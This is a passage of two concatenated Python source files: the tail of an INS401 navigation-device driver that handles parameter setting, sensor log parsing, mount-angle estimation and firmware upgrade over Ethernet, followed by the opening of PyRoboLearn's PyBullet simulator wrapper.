userParameters[9 + i]['value'] = result[i]
json.dump(self.properties,
json_data,
indent=4,
ensure_ascii=False)
# setting params
with open(app_file_path, 'r') as json_data:
self.properties = json.load(json_data)
result = self.set_params(self.properties["initial"]["userParameters"])
if result['packetType'] == 'success':
self.save_config()
# check saved result
self.check_predefined_result()
def save_mountangle_file(self, type, length, content):
''' Parse final packet
'''
if type == b'\x01\n': # imu
b = struct.pack('{0}B'.format(length), *content)
data = struct.unpack('<HIffffff', b)
buffer = format(data[0], '') + ","\
+ format(data[1]/1000, '11.4f') + "," + " ,"\
+ format(data[2], '14.10f') + ","\
+ format(data[3], '14.10f') + ","\
+ format(data[4], '14.10f') + ","\
+ format(data[5], '14.10f') + ","\
+ format(data[6], '14.10f') + ","\
+ format(data[7], '14.10f') + "\n"
self.f_process.write('$GPIMU,' + buffer)
elif type == b'\x02\n':
b = struct.pack('{0}B'.format(length), *content)
data = struct.unpack('<HIBdddfffBBffffffff', b)
buffer = '$GPGNSS,' + format(data[0], '') + ","\
+ format(data[1]/1000, '11.4f') + ","\
+ format(data[3], '14.9f') + ","\
+ format(data[4], '14.9f') + ","\
+ format(data[5], '10.4f') + ","\
+ format(data[6], '10.4f') + ","\
+ format(data[7], '10.4f') + ","\
+ format(data[8], '10.4f') + ","\
+ format(data[2], '3') + "\n"
self.f_process.write(buffer)
horizontal_speed = math.sqrt(data[13] * data[13] + data[14] * data[14])
track_over_ground = math.atan2(data[14], data[13]) * (57.295779513082320)
buffer = '$GPVEL,' + format(data[0], '') + ","\
+ format(data[1]/1000, '11.4f') + ","\
+ format(horizontal_speed, '10.4f') + ","\
+ format(track_over_ground, '10.4f') + ","\
+ format(data[15], '10.4f') + "\n"
self.f_process.write(buffer)
elif type == b'\x03\n':
b = struct.pack('{0}B'.format(length), *content)
data = struct.unpack('<HIBBdddfffffffffffffffffff', b)
if (data[1]%100) < 10:
buffer = format(data[0], '') + ","\
+ format(data[1]/1000, '11.4f') + ","\
+ format(data[4], '14.9f') + ","\
+ format(data[5], '14.9f') + ","\
+ format(data[6], '10.4f') + ","\
+ format(data[7], '10.4f') + ","\
+ format(data[8], '10.4f') + ","\
+ format(data[9], '10.4f') + ","\
+ format(data[12], '10.4f') + ","\
+ format(data[13], '10.4f') + ","\
+ format(data[14], '10.4f') + ","\
+ format(data[3], '3')
self.f_process.write('$GPINS,' + buffer + "\n")
self.mountangle.process_live_data(data, 1)
elif type == b'\x04\n':
b = struct.pack('{0}B'.format(length), *content)
data = struct.unpack('<HIBdBQ', b)
buffer = format(data[0], '') + ","\
+ format(data[1]/1000, '11.4f') + ","\
+ format(data[2], '3') + ","\
+ format(data[3], '10.4f') + ","\
+ format(data[4], '3') + ","\
+ format(data[5], '16') + "\n"
self.f_process.write('$GPODO,' + buffer)
elif type == b'\x05\n':
pass
elif type == b'\x06\n': # rover rtcm
pass
elif type == b'\x07\n': # corr imu
pass
def mountangle_parse_thread(self):
print('processing {0}\n'.format(self.ins401_log_file_path))
path = mkdir(self.ins401_log_file_path)
temp_file_path, temp_fname = os.path.split(self.ins401_log_file_path)
fname, ext = os.path.splitext(temp_fname)
self.f_process = open(path + '/' + fname + '-process', 'w+')
self.mountangle = MountAngle(os.getcwd(), path, path + '/' + fname + '-process')
self.mountangle.mountangle_set_parameters(self.big_mountangle_rvb)
self.mountangle.mountangle_run()
while True:
if self._message_center._is_stop:
time.sleep(1)
continue
if self.mountangle.out_result_flag:
rvb = []
for i in range(3):
f = self.big_mountangle_rvb[i] -self.mountangle.mountangle_estimate_result[i]
rvb.append(float('%.4f'% f))
self.set_mountangle_config(rvb)
time.sleep(2)
self.save_device_info()
time.sleep(2)
print('mountangle_result:', rvb)
os._exit(1)
time.sleep(5)
def start_mountangle_parse(self):
if self.ins401_log_file_path and self.mountangle_thread is None:
self.mountangle_thread = threading.Thread(target=self.mountangle_parse_thread)
self.mountangle_thread.start()
def on_receive_output_packet(self, packet_type, data, *args, **kwargs):
'''
Listener for getting output packet
'''
if packet_type == b'\x06\n':
if self.rtcm_rover_logf:
self.rtcm_rover_logf.write(bytes(data))
else:
raw_data = kwargs.get('raw')
if self.user_logf and raw_data:
self.user_logf.write(bytes(raw_data))
if self.mountangle:
payload_len = struct.unpack('<I', bytes(raw_data[4:8]))[0]
self.save_mountangle_file(packet_type, payload_len, raw_data[8:8+payload_len])
if packet_type == b'\x07\n':
if self.cli_options and self.cli_options.set_mount_angle and self.mountangle_thread is None:
content = raw_data[8:]
big_mountangle_rvb = []
for i in range(3):
big_mountangle_rvb.append(struct.unpack('<d', bytes(content[7 + 8 * i:15 + 8 * i]))[0])
for i in range(3):
self.big_mountangle_rvb[i] = big_mountangle_rvb[i] * 57.29577951308232
if self.mountangle:
self.mountangle.mountangle_logger.debug("[mountangle] big_mountangle_rvb: {0}, {1}, {2}".format(self.big_mountangle_rvb[0], self.big_mountangle_rvb[1], self.big_mountangle_rvb[2]))
self.start_mountangle_parse()
def after_jump_bootloader(self):
self.communicator.reshake_hand()
def do_reshake(self):
'''
check if in application mode
'''
for i in range(100):
try:
result = self.communicator.reshake_hand()
if result:
break
except:
time.sleep(0.5)
continue
def before_write_content(self, core, content_len):
command_CS = [0x04, 0xaa]
message_bytes = [ord('C'), ord(core)]
message_bytes.extend(struct.pack('>I', content_len))
self.communicator.reset_buffer()
for i in range(3):
command = helper.build_ethernet_packet(
self.communicator.get_dst_mac(),
self.communicator.get_src_mac(),
command_CS, message_bytes,
use_length_as_protocol=self.communicator.use_length_as_protocol)
time.sleep(1)
self.communicator.write(command.actual_command)
time.sleep(1)
result = helper.read_untils_have_data(
self.communicator, command_CS, 100, 200)
if result:
break
if result is None:
print('send cs command failed, core:{0}'.format(ord(core)))
os._exit(1)
def ins_firmware_write_command_generator(self, data_len, current, data):
command_WA = [0x03, 0xaa]
message_bytes = []
message_bytes.extend(struct.pack('>I', current))
message_bytes.extend(struct.pack('>I', data_len))
message_bytes.extend(data)
return helper.build_ethernet_packet(
self.communicator.get_dst_mac(),
self.communicator.get_src_mac(),
command_WA, message_bytes,
use_length_as_protocol=self.communicator.use_length_as_protocol)
def imu_firmware_write_command_generator(self, data_len, current, data):
command_WA = [0x41, 0x57]
message_bytes = []
message_bytes.extend(struct.pack('>I', current))
message_bytes.extend(struct.pack('B', data_len))
message_bytes.extend(data)
command = helper.build_ethernet_packet(
self.communicator.get_dst_mac(),
self.communicator.get_src_mac(),
command_WA, message_bytes)
command.packet_type = [0x57, 0x41]
return command
def ins_jump_bootloader_command_generator(self):
return helper.build_ethernet_packet(
self.communicator.get_dst_mac(),
self.communicator.get_src_mac(),
bytes([0x01, 0xaa]),
use_length_as_protocol=self.communicator.use_length_as_protocol)
def ins_jump_application_command_generator(self):
return helper.build_ethernet_packet(
self.communicator.get_dst_mac(),
self.communicator.get_src_mac(),
bytes([0x02, 0xaa]),
use_length_as_protocol=self.communicator.use_length_as_protocol)
def imu_jump_bootloader_command_generator(self):
return helper.build_ethernet_packet(
self.communicator.get_dst_mac(),
self.communicator.get_src_mac(),
bytes([0x49, 0x4a]))
def imu_jump_application_command_generator(self):
return helper.build_ethernet_packet(
self.communicator.get_dst_mac(),
self.communicator.get_src_mac(),
bytes([0x41, 0x4a]))
def build_worker(self, rule, content):
''' Build upgarde worker by rule and content
'''
if rule == 'rtk':
rtk_upgrade_worker = FirmwareUpgradeWorker(
self.communicator,
lambda: helper.format_firmware_content(content),
self.ins_firmware_write_command_generator,
192)
rtk_upgrade_worker.name = 'MAIN_RTK'
rtk_upgrade_worker.on(
UPGRADE_EVENT.FIRST_PACKET, lambda: time.sleep(15))
rtk_upgrade_worker.on(UPGRADE_EVENT.BEFORE_WRITE,
lambda: self.before_write_content('0', len(content)))
return rtk_upgrade_worker
if rule == 'ins':
ins_upgrade_worker = FirmwareUpgradeWorker(
self.communicator,
lambda: helper.format_firmware_content(content),
self.ins_firmware_write_command_generator,
192)
ins_upgrade_worker.name = 'MAIN_RTK'
ins_upgrade_worker.group = UPGRADE_GROUP.FIRMWARE
ins_upgrade_worker.on(
UPGRADE_EVENT.FIRST_PACKET, lambda: time.sleep(15))
ins_upgrade_worker.on(UPGRADE_EVENT.BEFORE_WRITE,
lambda: self.before_write_content('1', len(content)))
return ins_upgrade_worker
if rule == 'sdk':
sdk_upgrade_worker = EthernetSDK9100UpgradeWorker(
self.communicator,
lambda: helper.format_firmware_content(content))
sdk_upgrade_worker.group = UPGRADE_GROUP.FIRMWARE
return sdk_upgrade_worker
if rule == 'imu':
imu_upgrade_worker = FirmwareUpgradeWorker(
self.communicator,
lambda: helper.format_firmware_content(content),
self.imu_firmware_write_command_generator,
192)
imu_upgrade_worker.name = 'SUB_IMU'
imu_upgrade_worker.group = UPGRADE_GROUP.FIRMWARE
imu_upgrade_worker.on(
UPGRADE_EVENT.FIRST_PACKET, lambda: time.sleep(8))
return imu_upgrade_worker
def get_upgrade_workers(self, firmware_content):
workers = []
rules = [
InternalCombineAppParseRule('rtk', 'rtk_start:', 4),
InternalCombineAppParseRule('ins', 'ins_start:', 4),
InternalCombineAppParseRule('sdk', 'sdk_start:', 4),
InternalCombineAppParseRule('imu', 'imu_start:', 4),
]
if self.communicator:
self.communicator.reset_buffer()
self.communicator.upgrade()
parsed_content = firmware_content_parser(firmware_content, rules)
# foreach parsed content, if empty, skip register into upgrade center
for _, rule in enumerate(parsed_content):
content = parsed_content[rule]
if len(content) == 0:
continue
worker = self.build_worker(rule, content)
if not worker:
continue
workers.append(worker)
# wrap ins bootloader
start_index = -1
end_index = -1
for i, worker in enumerate(workers):
if isinstance(worker, FirmwareUpgradeWorker) and worker.name == 'MAIN_RTK':
start_index = i if start_index == -1 else start_index
end_index = i
if self.is_in_bootloader:
ins_wait_timeout = 1
else:
ins_wait_timeout = 3
ins_jump_bootloader_worker = JumpBootloaderWorker(
self.communicator,
command=self.ins_jump_bootloader_command_generator,
listen_packet=[0x01, 0xaa],
wait_timeout_after_command=ins_wait_timeout)
ins_jump_bootloader_worker.group = UPGRADE_GROUP.FIRMWARE
ins_jump_bootloader_worker.on(
UPGRADE_EVENT.AFTER_COMMAND, self.do_reshake)
ins_jump_application_worker = JumpApplicationWorker(
self.communicator,
command=self.ins_jump_application_command_generator,
listen_packet=[0x02, 0xaa],
wait_timeout_after_command=4)
ins_jump_application_worker.group = UPGRADE_GROUP.FIRMWARE
ins_jump_application_worker.on(
UPGRADE_EVENT.AFTER_COMMAND, self.do_reshake)
if start_index > -1 and end_index > -1:
workers.insert(
start_index, ins_jump_bootloader_worker)
workers.insert(
end_index+2, ins_jump_application_worker)
# wrap imu bootloader
start_index = -1
end_index = -1
for i, worker in enumerate(workers):
if isinstance(worker, FirmwareUpgradeWorker) and worker.name == 'SUB_IMU':
start_index = i if start_index == -1 else start_index
end_index = i
imu_jump_bootloader_worker = JumpBootloaderWorker(
self.communicator,
command=self.imu_jump_bootloader_command_generator,
listen_packet=[0x4a, 0x49],
wait_timeout_after_command=5)
imu_jump_bootloader_worker.on(
UPGRADE_EVENT.BEFORE_COMMAND, self.do_reshake)
imu_jump_bootloader_worker.group = UPGRADE_GROUP.FIRMWARE
imu_jump_application_worker = JumpApplicationWorker(
self.communicator,
command=self.imu_jump_application_command_generator,
listen_packet=[0x4a, 0x41])
imu_jump_application_worker.group = UPGRADE_GROUP.FIRMWARE
if start_index > -1 and end_index > -1:
workers.insert(
start_index, imu_jump_bootloader_worker)
workers.insert(
end_index+2, imu_jump_application_worker)
return workers
def get_device_connection_info(self):
return {
'modelName': self.device_info['name'],
'deviceType': self.type,
'serialNumber': self.device_info['sn'],
'partNumber': self.device_info['pn'],
'firmware': self.device_info['firmware_version']
}
def get_operation_status(self):
if self.is_logging:
return 'LOGGING'
return 'IDLE'
def check_predefined_result(self):
local_time = time.localtime()
formatted_file_time = time.strftime("%Y_%m_%d_%H_%M_%S", local_time)
file_path = os.path.join(
self.rtk_log_file_name,
'parameters_predefined_{0}.json'.format(formatted_file_time))
# save parameters to data log folder after predefined parameters setup
result = self.get_params()
if result['packetType'] == 'inputParams':
with open(file_path, 'w') as outfile:
json.dump(result['data'], outfile, indent=4, ensure_ascii=False)
# compare saved parameters with predefined parameters
hashed_predefined_parameters = helper.collection_to_dict(
self.properties["initial"]["userParameters"], key='paramId')
hashed_current_parameters = helper.collection_to_dict(result['data'],
key='paramId')
success_count = 0
fail_count = 0
fail_parameters = []
for key in hashed_predefined_parameters:
#print(hashed_current_parameters[key]['name'], 'current:',hashed_current_parameters[key]['value'],'predefined:',hashed_predefined_parameters[key]['value'])
if hashed_current_parameters[key]['value'] == \
hashed_predefined_parameters[key]['value']:
success_count += 1
else:
fail_count += 1
fail_parameters.append(
hashed_predefined_parameters[key]['name'])
check_result = 'Predefined Parameters are saved. Success ({0}), Fail ({1})'.format(
success_count, fail_count)
if success_count == len(hashed_predefined_parameters.keys()):
print_green(check_result)
if fail_count > 0:
print_yellow(check_result)
print_yellow('The failed parameters: {0}'.format(fail_parameters))
def save_device_info(self):
''' Save device configuration
File name: configuration.json
'''
if not self.rtk_log_file_name or not self._device_info_string:
return
if self.is_in_bootloader:
return
result = self.get_params()
device_configuration = None
file_path = os.path.join(self.rtk_log_file_name, 'configuration.json')
if not os.path.exists(file_path):
device_configuration = []
else:
with open(file_path) as json_data:
device_configuration = (list)(json.load(json_data))
if result['packetType'] == 'inputParams':
session_info = dict()
session_info['time'] = time.strftime("%Y-%m-%d %H:%M:%S",
time.localtime())
session_info['device'] = self.device_info
session_info['app'] = self.app_info
if self.cli_options.debug == 'true':
session_info['compile'] = self.compile_info
session_info['interface'] = self.cli_options.interface
parameters_configuration = dict()
for item in result['data']:
param_name = item['name']
param_value = item['value']
parameters_configuration[param_name] = param_value
session_info['parameters'] = parameters_configuration
device_configuration.append(session_info)
with open(file_path, 'w') as outfile:
json.dump(device_configuration,
outfile,
indent=4,
ensure_ascii=False)
def after_upgrade_completed(self):
pass
# command list
def server_status(self, *args): # pylint: disable=invalid-name
'''
Get server connection status
'''
return {'packetType': 'ping', 'data': {'status': '1'}}
def get_device_info(self, *args): # pylint: disable=invalid-name
'''
Get device information
'''
return {
'packetType':
'deviceInfo',
'data': [{
'name': 'Product Name',
'value': self.device_info['name']
}, {
'name': 'IMU',
'value': self.device_info['imu']
}, {
'name': 'PN',
'value': self.device_info['pn']
}, {
'name': 'Firmware Version',
'value': self.device_info['firmware_version']
}, {
'name': 'SN',
'value': self.device_info['sn']
}, {
'name': 'App Version',
'value': self.app_info['version']
}]
}
def get_log_info(self):
'''
Build information for log
'''
return {
"type": self.type,
"model": self.device_info['name'],
"logInfo": {
"pn": self.device_info['pn'],
"sn": self.device_info['sn'],
"rtkProperties": json.dumps(self.properties)
}
}
def get_conf(self, *args): # pylint: disable=unused-argument
'''
Get json configuration
'''
return {
'packetType': 'conf',
'data': {
'outputs': self.properties['userMessages']['outputPackets'],
'inputParams': self.properties['userConfiguration']
}
}
@with_device_message
def get_params(self, *args): # pylint: disable=unused-argument
'''
Get all parameters
'''
has_error = False
parameter_values = []
for parameter in self.properties['userConfiguration']:
if parameter['paramId'] == 0:
continue
result = self.get_param(parameter)
if result['packetType'] == 'error':
has_error = True
break
parameter_values.append(result['data'])
time.sleep(0.3)
if not has_error:
self.parameters = parameter_values
yield {'packetType': 'inputParams', 'data': parameter_values}
yield {'packetType': 'error', 'data': 'No Response'}
@with_device_message
def get_param(self, params, *args): # pylint: disable=unused-argument
'''
Update paramter value
'''
gP = b'\x02\xcc'
message_bytes = []
message_bytes.extend(encode_value('uint32', params['paramId']))
command_line = helper.build_ethernet_packet(
self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
gP, message_bytes)
result = yield self._message_center.build(command=command_line.actual_command)
data = result['data']
error = result['error']
if error:
yield {'packetType': 'error', 'data': 'No Response'}
if data:
self.parameters = data
yield {'packetType': 'inputParam', 'data': data}
yield {'packetType': 'error', 'data': 'No Response'}
@with_device_message
def set_params(self, params, *args): # pylint: disable=unused-argument
'''
Update paramters value
'''
input_parameters = self.properties['userConfiguration']
for parameter in params:
exist_parameter = next((x for x in input_parameters
if x['paramId'] == parameter['paramId']),
None)
if exist_parameter:
parameter['type'] = exist_parameter['type']
result = self.set_param(parameter)
# print('result:', result)
packet_type = result['packetType']
data = result['data']
if packet_type == 'error':
yield {'packetType': 'error', 'data': {'error': data}}
break
if data['error'] > 0:
yield {'packetType': 'error', 'data': {'error': data}}
break
time.sleep(0.1)
yield {'packetType': 'success', 'data': {'error': 0}}
@with_device_message
def set_param(self, params, *args): # pylint: disable=unused-argument
'''
Update paramter value
'''
uP = b'\x03\xcc'
message_bytes = []
message_bytes.extend(encode_value('uint32', params['paramId']))
message_bytes.extend(encode_value(params['type'], params['value']))
command_line = helper.build_ethernet_packet(
self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
uP, message_bytes)
result = yield self._message_center.build(command=command_line.actual_command)
error = result['error']
data = result['data']
if error:
yield {'packetType': 'error', 'data': {'error': data}}
yield {'packetType': 'success', 'data': {'error': data}}
@with_device_message
def save_config(self, *args): # pylint: disable=unused-argument
'''
Save configuration
'''
sC = b'\x04\xcc'
command_line = helper.build_ethernet_packet(
self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
sC)
# self.communicator.write(command_line)
# result = self.get_input_result('sC', timeout=2)
result = yield self._message_center.build(command=command_line.actual_command,
timeout=2)
data = result['data']
error = result['error']
if error:
yield {'packetType': 'error', 'data': data}
yield {'packetType': 'success', 'data': data}
@with_device_message
def set_mount_angle(self, *args): # pylint: disable=unused-argument
'''
Save configuration
'''
sC = b'\x05\xcc'
command_line = helper.build_ethernet_packet(
self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
sC)
result = yield self._message_center.build(command=command_line.actual_command,
timeout=2)
data = result['data']
error = result['error']
print('set mount angle result:', data)
if error:
yield {'packetType': 'error', 'data': data}
yield {'packetType': 'success', 'data': data}
@with_device_message
def get_ins_message(self):
command_gi = b'\x09\x0a'
command_line = helper.build_ethernet_packet(
self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
command_gi)
result = yield self._message_center.build(command=command_line.actual_command, timeout=3)
error = result['error']
data = result['data']
raw_data = result['raw']
if error:
yield {'packetType': 'error', 'data': {'error': error}, 'raw_data': {'error': error}}
yield {'packetType': 'success', 'data': data, 'raw_data': raw_data}
@with_device_message
def get_compile_message(self):
command_gc = b'\x09\xaa'
command_line = helper.build_ethernet_packet(
self.communicator.get_dst_mac(), self.communicator.get_src_mac(),
command_gc)
result = yield self._message_center.build(command=command_line.actual_command, timeout=3)
error = result['error']
data = result['data']
raw_data = result['raw']
if error:
yield {'packetType': 'error', 'data': {'error': error}, 'raw_data': {'error': error}}
yield {'packetType': 'success', 'data': data, 'raw_data': raw_data}
@with_device_message
def reset_params(self, params, *args): # pylint: disable=unused-argument
'''
Reset params to default
'''
raise Exception('Not implemented')
def upgrade_framework(self, params, *args): # pylint: disable=unused-argument
'''
Upgrade framework
'''
file = ''
if isinstance(params, str):
file = params
if isinstance(params, dict):
file = params['file']
# start a thread to do upgrade
if not self.is_upgrading:
self.is_upgrading = True
self._message_center.pause()
if self._logger is not None:
self._logger.stop_user_log()
self.thread_do_upgrade_framework(file)
print("Upgrade INS401 firmware started at:[{0}].".format(
datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
return {'packetType': 'success'}
@with_device_message
def send_command(self, command_line):
# command_line = #build a command
# helper.build_input_packet('rD')
result = yield self._message_center.build(command=command_line,
timeout=5)
error = result['error']
data = result['data']
if error:
yield {'packetType': 'error', 'data': {'error': error}}
yield {'packetType': 'success', 'data': data}
def prepare_lib_folder(self):
executor_path = resource.get_executor_path()
lib_folder_name = 'libs'
# copy contents of libs file under executor path
lib_folder_path = os.path.join(
executor_path, lib_folder_name)
if not os.path.isdir(lib_folder_path):
os.makedirs(lib_folder_path)
DR_lib_file = "DR_MountAngle"
INS_lib_file = "INS"
if os.name == 'nt': # windows
DR_lib_file = "DR_MountAngle.dll"
INS_lib_file = "INS.dll"
DR_lib_path = os.path.join(lib_folder_path, DR_lib_file)
if not os.path.isfile(DR_lib_path):
lib_content = resource.get_content_from_bundle(
lib_folder_name, DR_lib_file)
if lib_content is None:
raise ValueError('Lib file content is empty')
with open(DR_lib_path, "wb") as code:
code.write(lib_content)
INS_lib_path = os.path.join(lib_folder_path, INS_lib_file)
if not os.path.isfile(INS_lib_path):
lib_content = resource.get_content_from_bundle(
lib_folder_name, INS_lib_file)
if lib_content is None:
raise ValueError('Lib file content is empty')
with open(INS_lib_path, "wb") as code:
code.write(lib_content)
if DR_lib_path and INS_lib_path:
return True
return False
|
bullet.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Define the Bullet Simulator API.
This is the main interface that communicates with the PyBullet simulator [1]. By defining this interface, it allows to
decouple the PyRoboLearn framework from the simulator. It also converts some data types to the ones required by
PyBullet. For instance, some methods in PyBullet do not accept numpy arrays but only lists. The interface provided
here makes the necessary conversions.
The signature of each method defined here are inspired by [1,2] but in accordance with the PEP8 style guide [3].
Parts of the documentation for the methods have been copied-pasted from [2] for completeness purposes.
- Supported Python versions: Python 2.7 and 3.*
- Python wrappers: manually written by Erwin Coumans (see
https://github.com/bulletphysics/bullet3/blob/master/examples/pybullet/pybullet.c)
Dependencies in PRL:
* `pyrobolearn.simulators.simulator.Simulator`
References:
- [1] PyBullet: https://pybullet.org
- [2] PyBullet Quickstart Guide: https://docs.google.com/document/d/10sXEhzFRSnvFcl3XxNGhnD4N2SedqwdAvK3dsihxVUA
- [3] PEP8: https://www.python.org/dev/peps/pep-0008/
"""
# general imports
import os
# import inspect
import time
import numpy as np
# import pybullet
import pybullet
import pybullet_data
# from pybullet_envs.bullet.bullet_client import BulletClient
from pybullet_utils.bullet_client import BulletClient
# import PRL simulator
from pyrobolearn.simulators.simulator import Simulator
__author__ = "Brian Delhaisse"
__copyright__ = "Copyright 2018, PyRoboLearn"
__credits__ = ["Bullet (Erwin Coumans and Yunfei Bai)", "Brian Delhaisse"]
__license__ = "GNU GPLv3"
__version__ = "1.0.0"
__maintainer__ = "Brian Delhaisse"
__email__ = "briandelhaisse@gmail.com"
__status__ = "Development"
class Bullet(Simulator):
r"""PyBullet simulator.
This is a wrapper around the PyBullet API [1]. For many methods, it is just the same as calling directly the
original methods. However for several ones, it converts the data into the correct data type.
For instance, some methods in PyBullet returns a matrix :math:`NxM` in a list format with length :math:`NxM`,
instead of a numpy array. Other data types includes vectors, quaternions, and others which are all returned as
list. The problem with this approach is that we first have to convert the data in our code in order to operate
on it. A converter can be specified which converts into the desired format. If none, it will convert the data
into numpy arrays instead of lists.
Also, this wrapper enforces consistency. For instance, all the given and produced angles are represented in
radians, and not in degrees. Some original `pybullet` methods require angles expressed in radians, and others in
degrees.
The class also presents the documentation of each method which relieve us to check the user guide [1].
Most of the documentation has been copied-pasted from [1], written by Erwin Coumans and Yunfei Bai.
Also, Some extra methods have been defined.
Finally, note that this API is incompatible with the original `pybullet`, i.e. it is not interchangeable in the
code! In addition, using this interface allows us to easily switch with other `Simulator` APIs, and make it more
modular if the signature of the original PyBullet library change.
In the following documentation:
* `vec3` specifies a list/tuple/np.array of 3 floats
* `quat` specifies a list/tuple/np.array of 4 floats
Examples:
sim = Bullet()
References:
- [1] "PyBullet, a Python module for physics simulation for games, robotics and machine learning", Erwin
Coumans and Yunfei Bai, 2016-2019
- [2] PyBullet Quickstart Guide: https://docs.google.com/document/d/10sXEhzFRSnvFcl3XxNGhnD4N2SedqwdAvK3dsihxVUA
Erwin Coumans and Yunfei Bai, 2017/2018
"""
def __init__(self, render=True, num_instances=1, middleware=None, **kwargs):
"""
Initialize the PyBullet simulator.
Args:
render (bool): if True, it will open the GUI, otherwise, it will just run the server.
num_instances (int): number of simulator instances.
middleware (MiddleWare, None): middleware instance.
**kwargs (dict): optional arguments (this is not used here).
"""
# try to import the pybullet library
# normally that should be done outside the class but because it might have some conflicts with other libraries
# import pybullet
# import pybullet_data
# from pybullet_envs.bullet.bullet_client import BulletClient
super(Bullet, self).__init__(render=render, num_instances=num_instances, middleware=middleware, **kwargs)
# parse the kwargs
# Connect to pybullet
if render: # GUI
self.connection_mode = pybullet.GUI
self.sim = BulletClient(connection_mode=self.connection_mode)
self.sim.configureDebugVisualizer(self.sim.COV_ENABLE_GUI, 0)
else: # without GUI
self.connection_mode = pybullet.DIRECT
self.sim = BulletClient(connection_mode=self.connection_mode)
# set simulator ID
self.id = self.sim._client
# add additional search path when loading URDFs, SDFs, MJCFs, etc.
self.sim.setAdditionalSearchPath(pybullet_data.getDataPath())
# TODO: add gazebo_models path
# create history container that keeps track of what we created in the simulator (including collision and visual
# shapes, bodies, URDFs, SDFs, MJCFs, etc), the textures we applied, the constraints we created, the dynamical
# properties we changed, etc. This is useful when we need to create an other instance of the simulator,
# or when we need to change the connection type (by rendering or hiding the GUI).
# The items in the history container are in the same order there were called. Each item is a tuple where the
# first item is the name of the method called, and the second item is the parameters that were passed to that
# method.
self.history = [] # keep track of every commands
self.ids = [] # keep track of created unique ids
# main camera in the simulator
self._camera = None
# given parameters
self.kwargs = {'render': render, 'kwargs': kwargs}
# define default timestep
self.default_timestep = 1. / 240
self.dt = self.default_timestep
# by default, set gravity
self.set_gravity()
# go through the global variables / attributes defined in pybullet and set them here
# this includes for instance: JOINT_REVOLUTE, POSITION_CONTROL, etc.
# for attribute in dir(pybullet):
# if attribute[0].isupper(): # any global variable starts with a capital letter
# setattr(self, attribute, getattr(pybullet, attribute))
# def __del__(self):
# """Clean up connection if not already done.
#
# Copied-pasted from `pybullet_envs/bullet/bullet_client.py`.
# """
# try:
# pybullet.disconnect(physicsClientId=self._client)
# except pybullet.error:
# pass
#
# def __getattr__(self, name):
# """Inject the client id into Bullet functions.
#
# Copied-pasted from `pybullet_envs/bullet/bullet_client.py`.
# """
# attribute = getattr(pybullet, name)
# if inspect.isbuiltin(attribute):
# attribute = functools.partial(attribute, physicsClientId=self._client)
# return attribute
##############
# Properties #
##############
@property
def version(self):
"""Return the version of the simulator in a year-month-day format."""
return self.sim.getAPIVersion()
@property
def timestep(self):
"""Return the simulator time step."""
return self.dt
#############
# Operators #
#############
def __copy__(self):
"""Return a shallow copy of the Bullet simulator.
Warnings:
- this returns a simulator in the DIRECT mode. PyBullet does not allow to have several instances of the
simulator in the GUI mode in the same process.
- this method does not copy the dynamic properties or load the 3D models in the returned simulator.
Returns:
Bullet: new simulator instance.
"""
return Bullet(render=False)
def __deepcopy__(self, memo={}):
"""Return a deep copy of the Bullet simulator.
Warnings:
- this returns a simulator in the DIRECT mode. PyBullet does not allow to have several instances of the
simulator in the GUI mode in the same process.
- this method does not change the connection mode of the simulator, this has to be done outside the method
because it could otherwise cause different errors (e.g. when using multiprocessing).
Args:
memo (dict): dictionary containing references about already instantiated objects and allowing to share
information. Notably, it can contain the following keys `copy_models` (bool) which specifies if we
should load the models that have been loaded into the simulator (by default, it is False), and
`copy_properties` which specifies if we should copy the dynamic properties that has been set such as
gravity, friction coefficients, and others (by default, it is False).
Returns:
Bullet: bullet simulator in DIRECT mode.
"""
# if the object has already been copied return the reference to the copied object
if self in memo:
return memo[self]
# check if the memo has arguments that specify how to deep copy the simulator
copy_models = memo.get('copy_parameters', False)
copy_properties = memo.get('copy_properties', False)
# create new bullet simulator
sim = Bullet(render=False)
# load the models in the new simulator if specified
if copy_models:
pass
# copy the properties in the new simulator if specified
if copy_properties:
pass
# update the memodict
memo[self] = sim
return sim
##################
# Static methods #
##################
@staticmethod
def simulate_soft_bodies():
"""Return True if the simulator can simulate soft bodies."""
# For the moment, this feature is not well supported in PyBullet
# You can check Jan Matas's work for soft bodies:
# - https://github.com/JanMatas/bullet3
# - https://www.imperial.ac.uk/media/imperial-college/faculty-of-engineering/computing/public/1718-ug-projects\
# /Jan-Matas-Learning-end-to-end-robotic-manipulation-of-deformable-objects.pdf
return False
@staticmethod
def supports_dynamic_loading():
"""Return True if the simulator supports the dynamic loading of models."""
return True
###########
# Methods #
###########
##############
# Simulators #
##############
# @staticmethod
# def copy(other, copy_models=True, copy_properties=True):
# """Create another simulator.
#
# Args:
# other (Bullet): the other simulator.
# copy_models (bool): if True, it will load the various 3d models in the simulator.
# copy_properties (bool): if True, it will copy the physical properties (gravity, friction, etc).
# """
# # create another simulator
# if not isinstance(other, Bullet):
# raise TypeError("Expecting the given 'other' simulator to be an instance of `Bullet`, instead got: "
# "{}".format(type(other)))
# sim = Bullet(render=(other.connection_mode == pybullet.GUI))
#
# # load the models if specified
# if copy_models:
# for item in other.history:
# if item[0] == 'visual':
# sim.create_visual_shape(**item[1])
# elif item[0] == 'collision':
# sim.create_collision_shape(**item[1])
# elif item[0] == 'body':
# sim.create_body(**item[1])
# elif item[0] == 'urdf':
# sim.load_urdf(**item[1])
# elif item[0] == 'sdf':
# sim.load_sdf(**item[1])
# elif item[0] == 'mjcf':
# sim.load_mjcf(**item[1])
# elif item[0] == 'texture':
# sim.load_texture(**item[1])
# else:
# pass
#
# return sim
def __init(self, connection_mode):
"""Initialize the simulator with the specified connection mode."""
# close the previous simulator
if self.sim is not None:
self.close()
# initialize the simulator (create it, set its id, and set the path to the models)
# self.sim.connect(connection_mode)
self.sim = BulletClient(connection_mode=connection_mode)
self.id = self.sim._client
self.sim.setAdditionalSearchPath(pybullet_data.getDataPath())
# execute each method in the history
history = list(self.history)
self.history = []
for item in history:
method = getattr(self, item[0])
method(**item[1])
def reset(self):
"""Reset the simulator.
"It will remove all objects from the world and reset the world to initial conditions." [1]
"""
self.sim.resetSimulation()
def close(self):
"""Close the simulator."""
del self.sim
# try:
# self.sim.disconnect(physicsClientId=self.id)
# except pybullet.error:
# pass
def step(self, sleep_time=0.):
